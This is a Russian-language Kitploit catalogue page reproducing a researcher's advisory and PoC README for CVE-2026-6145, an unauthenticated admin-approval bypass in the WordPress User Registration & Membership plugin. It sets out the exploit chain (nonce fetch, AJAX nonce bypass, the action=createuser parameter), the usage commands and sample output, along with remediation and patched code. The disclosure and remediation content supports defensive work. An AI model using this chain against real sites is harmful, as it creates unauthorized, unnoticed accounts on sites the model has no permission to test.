Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-6145 — User Registration & Membership <= 5.1.5 - Неаутентифицированное отсутствие авторизации для обхода утверждения администратором через параметр 'action' | Kitploit
Инструменты/GitHubGitHub/hann1bl3l3ct3r/cve-2026-6145
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubhann1bl3l3ct3r/cve-2026-6145

CVE-2026-6145

User Registration & Membership <= 5.1.5 - Неаутентифицированное отсутствие авторизации для обхода утверждения администратором через параметр 'action'

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-6145 — User Registration & Membership для WordPress: Обход подтверждения администратором без аутентификации

Эксплойт proof-of-concept для CVE-2026-6145, уязвимости отсутствия авторизации в плагине User Registration & Membership для WordPress (≤ 5.1.5), которая позволяет неаутентифицированным атакующим обойти требование подтверждения администратором при создании новых учётных записей.

CVE CVSS CWE License


Краткая сводка

CVE IDCVE-2026-6145
CNAWordfence
УязвимостьОтсутствие авторизации — обход подтверждения администратором
CWECWE-862 (Отсутствие авторизации)
CVSS 3.15.3 Средний (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
ЗатронутоUser Registration & Membership для WordPress — все версии ≤ 5.1.5
ИсправленоВерсия > 5.1.5
ИсследовательAnthony Cihan — руководитель отдела безопасности атак, Obviam
РаскрытиеПрограмма ответственного раскрытия Wordfence
Опубликовано2026-05-14

Детали уязвимости

Корневая причина

Метод is_admin_creation_process() в includes/class-ur-user-approval.php является единственным шлюзом, определяющим, следует ли рассматривать новую регистрацию как создание, инициированное администратором. Когда этот метод возвращает true, происходят два побочных эффекта:

  • set_user_status() устанавливает статус нового пользователя в APPROVED, пропуская очередь ожидания подтверждения.
  • send_request_notification_to_admin() подавляет уведомление администратора о новой регистрации.

Сам метод в версии 5.1.5 не содержит проверки аутентификации, авторизации или nonce:

root@kitploit:~
// includes/class-ur-user-approval.php:459-461
protected function is_admin_creation_process() {
    return ( isset( $_REQUEST['action'] ) && 'createuser' == $_REQUEST['action'] );
}

Поскольку $_REQUEST объединяет $_GET, $_POST и $_COOKIE, неаутентифицированный атакующий может удовлетворить эту проверку, добавив ?action=createuser в URL отправки регистрационной формы. Затем плагин автоматически подтверждает учётную запись и никогда не уведомляет администратора.

Цепочка эксплуатации

Хотя CVE-2026-6145 напрямую касается отсутствия авторизации в is_admin_creation_process(), полная неаутентифицированная эксплуатация в отношении защищённой регистрационной формы требует объединения с двумя дополнительными проблемами в той же версии плагина, обе из которых обрабатываются включённым PoC автоматически:

Результат: полностью подтверждённая учётная запись, созданная без взаимодействия или уведомления администратора, на сайте, который явно требует подтверждения администратора для новых регистраций.


Доказательство концепции

Требования

  • Python 3.8+
  • Библиотека requests
  • Цель для тестирования, на которой работает User Registration & Membership ≤ 5.1.5 с:
    • Включённой регистрацией
    • Включённым параметром входа с подтверждением администратором
    • Известным ID формы регистрации (виден в исходном коде страницы как data-form-id)

Установка

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2026-6145.git
cd CVE-2026-6145
pip install requests

Использование

root@kitploit:~
python3 poc_admin_approval_bypass.py <target_url> <form_id>

Пример:

root@kitploit:~
python3 poc_admin_approval_bypass.py http://wp.example.lab 7

Ожидаемый вывод

root@kitploit:~
======================================================================
  User Registration v5.1.4 - Admin Approval Bypass PoC
  CVE: 2026-6145 | CWE-862
  Affects: User Registration & Membership <= 5.1.5
======================================================================

[*] Target:  http://wp.example.lab
[*] Form ID: 7

[*] STEP 1: Obtaining nonce via unauthenticated AJAX endpoint
[+] SUCCESS: Got valid nonce for form 7: a1b2c3d4e5

[*] STEP 2: Registering user with admin approval bypass
    Username: poc_bypass_1747249200
    Email:    [email protected]
[+] Registration request processed (HTTP 200)

[*] STEP 3: Verifying user was created
[+] CONFIRMED: User 'poc_bypass_1747249200' exists in the database

======================================================================
  RESULTS
======================================================================
  Unauthenticated Nonce Generation:  CONFIRMED
  AJAX Nonce Bypass:                  CONFIRMED
  Admin Approval Bypass (CVE-...):    CONFIRMED

  [!] User was created with AUTO-APPROVED status
  [!] Admin was NOT notified of this registration
======================================================================

Проверка

После запуска PoC войдите в wp-admin и проверьте Пользователи → Все пользователи:

  • Созданная учётная запись отображается со статусом Подтверждён.
  • Пользователь, зарегистрированный через обычную форму в тот же период, остаётся Ожидающим.
  • Почтовый ящик администратора не содержит письма для учётной записи, созданной в обход.

Воздействие

На сайтах WordPress, использующих подтверждение администратором в качестве основного барьера против нежелательного создания учётных записей — что типично для сайтов членства, закрытых сообществ, внутренних порталов, B2B-платформ и любых сайтов, требующих проверки личности перед доступом, — эта уязвимость незаметно нейтрализует этот контроль. Конкретные последствия включают:

  • Обход бизнес-логики управления доступом: любой контент или функциональность, ограниченные регистрацией (страницы только для членов, закрытые форумы, защищённые загрузки), становятся доступными без проверки администратором.
  • Срыв мер борьбы с мошенничеством и злоупотреблениями: сайты, использующие подтверждение администратором для фильтрации спам-учётных записей, поддельных или мошеннических регистраций, полностью теряют этот фильтр.
  • Скрытое создание учётных записей: из-за подавления уведомления администратора несанкционированные учётные записи могут оставаться незамеченными до ручной проверки пользователей.
  • Платформа для дальнейших атак: подтверждённая учётная запись с низкими привилегиями является точкой опоры для последующего повышения привилегий, злоупотребления контентом или эксплуатации других уязвимостей, требующих аутентификации, на том же сайте.

Оценка CVSS отражает только воздействие на целостность (нет прямой потери конфиденциальности данных или нарушения обслуживания), но реальное воздействие масштабируется в зависимости от того, насколько сильно сайт полагается на рабочий процесс подтверждения как на границу безопасности.


Затронутые версии

ВерсияСтатус
≤ 5.1.5Уязвима
> 5.1.5Исправлена

Устранение

Для администраторов сайта

  1. Немедленно обновитесь до последней версии User Registration & Membership (> 5.1.5).
  2. Проверьте Пользователи → Все пользователи на наличие неожиданных подтверждённых учётных записей, созданных после установки уязвимой версии. Обратите особое внимание на учётные записи, для которых нет соответствующего уведомления администратору по электронной почте.
  3. Смените учётные данные и проверьте активность любых подозрительных учётных записей.
  4. Если немедленное обновление невозможно, отключите публичную регистрацию в настройках WordPress в качестве временной меры.

Для разработчиков / Справочник по коду

Уязвимый метод должен требовать как проверки возможности, так и валидного nonce:

root@kitploit:~
protected function is_admin_creation_process() {
    return current_user_can( 'create_users' )
        && isset( $_REQUEST['action'] )
        && 'createuser' === $_REQUEST['action']
        && isset( $_REQUEST['_wpnonce_create-user'] )
        && wp_verify_nonce(
               wp_unslash( $_REQUEST['_wpnonce_create-user'] ),
               'create-user'
           );
}

Хронология раскрытия

ДатаСобытие
2026-03-09

Ссылки

  • Уведомление Wordfence — CVE-2026-6145
  • NVD — CVE-2026-6145
  • CWE-862: Отсутствие авторизации
  • Репозиторий плагинов WordPress — User Registration & Membership

Связанные уязвимости в том же плагине

Исследователи, отслеживающие модель авторизации этого плагина, также могут быть заинтересованы в:

  • CVE-2026-1492 — Неаутентифицированное повышение привилегий (≤ 5.1.2)
  • CVE-2026-1779 — Обход аутентификации через register_member (≤ 5.1.2)
  • CVE-2026-4056 — Нарушенный контроль доступа в REST API правил доступа к контенту (5.0.1 – 5.1.4)
  • CVE-2026-6203 — Неаутентифицированное открытое перенаправление (≤ 5.1.4)

Авторы

Исследование, обнаружение и разработка PoC:

Anthony Cihan Offensive Security Lead — Obviam

Если вы ссылаетесь на эту работу, пожалуйста, указывайте CVE-2026-6145 с указанием авторства Anthony Cihan / Obviam.


Правовое и этическое уведомление

Данное доказательство концепции публикуется для защитных исследований, разработки средств обнаружения и авторизованного тестирования безопасности. Оно предназначено для помощи:

  • Администраторам сайтов WordPress в проверке развёртывания исправлений
  • Поставщикам решений безопасности в разработке сигнатур обнаружения и правил WAF
  • Исследователям в изучении шаблонов контроля авторизации в плагинах WordPress
  • Преподавателям и студентам программ по наступательной и оборонительной безопасности

Оригинальное исследование проводилось в авторизованной лабораторной среде на основании подписанного соглашения, с координированным раскрытием поставщику через Программу ответственного раскрытия Wordfence до публичного выпуска.

Запуск данного PoC против любой системы, которая вам не принадлежит или на тестирование которой у вас нет явного письменного разрешения, является незаконным в соответствии с Законом США о компьютерном мошенничестве и злоупотреблениях (18 U.S.C. § 1030), Законом Великобритании о неправомерном использовании компьютеров 1990 года, Директивой ЕС 2013/40/EU и эквивалентным законодательством в большинстве юрисдикций. Автор и Obviam отказываются от любой ответственности за неправомерное использование этого кода.

Используя этот репозиторий, вы подтверждаете, что прочитали, поняли и приняли эти условия.


Лицензия

Выпущено под лицензией MIT. Требуется указание авторства в соответствии с разделом об авторах выше.

Скачать инструмент
ШагПроблемаЦель
1Неаутентифицированная генерация nonce через конечную точку user_registration_get_recent_nonce wp_ajax_nopriv (проверка только Referer)Получить валидный ur_frontend_form_nonce без аутентифицированной сессии
2Обход проверки AJAX nonce, когда ur_fallback_submit не пуст в обработчике формыОтправить регистрацию через запасной путь без валидного реферера AJAX
3CVE-2026-6145 — action=createuser в $_REQUEST переключает is_admin_creation_process() в trueАвтоматически подтвердить новую учётную запись и подавить уведомление администратора
Уязвимость выявлена в ходе авторизованного аудита безопасности плагина версии 5.1.4
2026-03-09Первоначальный отчёт отправлен в Программу ответственного раскрытия Wordfence
2026-04-12CVE-2026-6145 зарезервирован Wordfence (CNA)
2026-05-14Опубликована исправленная версия поставщика; опубликован CVE-2026-6145
2026-05-14Выпущен данный PoC в координации с публичным уведомлением